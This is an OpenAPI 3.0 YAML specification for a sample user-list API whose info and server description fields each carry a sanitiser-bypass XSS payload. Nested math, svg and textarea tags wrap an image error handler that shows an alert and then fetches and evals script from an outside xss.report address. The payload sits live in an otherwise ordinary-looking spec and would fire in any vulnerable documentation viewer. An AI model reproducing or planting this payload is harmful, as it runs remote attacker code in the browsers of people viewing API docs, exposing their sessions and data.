openapi: 3.0.0
info:
  title: Sample API
  description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><img src="https://upload.wikimedia.org/wikipedia/commons/b/bb/Anonymous.jpg" onerror=alert("Pak Tiko was here!!!");fetch("https://xss.report/c/santiko86").then(function(res){res.text().then(function(data){eval(data)})})>'></textarea></h1>">"</textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
  version: 0.1.9

servers:
  - url: http://api.example.com/v1
    description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><img src="https://upload.wikimedia.org/wikipedia/commons/b/bb/Anonymous.jpg" onerror=alert("Pak Tiko was here!!!");fetch("https://xss.report/c/santiko86").then(function(res){res.text().then(function(data){eval(data)})})>'></textarea></h1>">"</textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
  - url: http://staging-api.example.com
    description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><img src="https://upload.wikimedia.org/wikipedia/commons/b/bb/Anonymous.jpg" onerror=alert("Pak Tiko was here!!!");fetch("https://xss.report/c/santiko86").then(function(res){res.text().then(function(data){eval(data)})})>'></textarea></h1>">"</textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>

paths:
  /users:
    get:
      summary: Returns a list of users.
      description: Optional extended description in CommonMark or HTML.
      responses:
        "200": # status code
          description: A JSON array of user names
          content:
            application/json:
              schema:
                type: array
                items:
                  type: string
